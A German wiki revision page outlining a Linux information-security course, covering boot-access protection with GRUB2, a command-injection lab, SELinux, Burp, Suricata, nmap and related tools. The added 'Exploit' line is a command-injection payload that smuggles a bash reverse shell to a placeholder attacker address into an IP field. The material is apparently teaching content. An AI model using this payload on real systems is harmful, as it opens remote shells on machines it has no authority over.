Informationssicherheit in Linux-Umgebungen: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 19: Zeile 19:
  
 
== Exploit ==
 
== Exploit ==
 +
 +
* '''1.1.1.1 ; bash -c "bash -i >& /dev/tcp/''i.p.des.hackers''/''port'' 0>&1"'''
  
 
= SELinux =
 
= SELinux =

Version vom 17. August 2023, 07:52 Uhr

physischer Zugangsschutz

Bootzugriff absicher

  • Der erste Prozess mit dem Linux gebootet wird, kann von GRUB2 bestimmt werden.
  • So kann man das Passwort des root-Nutzers zurücksetzen, falls man diesen vergessen hat.
  • D.h. aber auch, dass ein unautorisierter Benutzer mit Zugriff auf die physische Maschine sich eine Shell geben kann ohne Kenndaten einzugeben.
  • Anleitung zu Linux boot hacking
  • Man sollte also kritische Systeme mit einem GRUB Passwort vor ungewollten Änderungen der Boot-Einträge absichern
  • Anleitung zum setzen eines Passworts für GRUB2

Command Injection über eine Webanwendung

Laboraufbau

Schwachstelle im Code

Exploit

  • 1.1.1.1 ; bash -c "bash -i >& /dev/tcp/i.p.des.hackers/port 0>&1"

SELinux

OWASP Juice Shop

Burp

Suricata

Schwachstellenerkennung/-scanning

nmap

Greenbone Security Manager

Cross Site Scripting

Office-Tools Macro-Exploit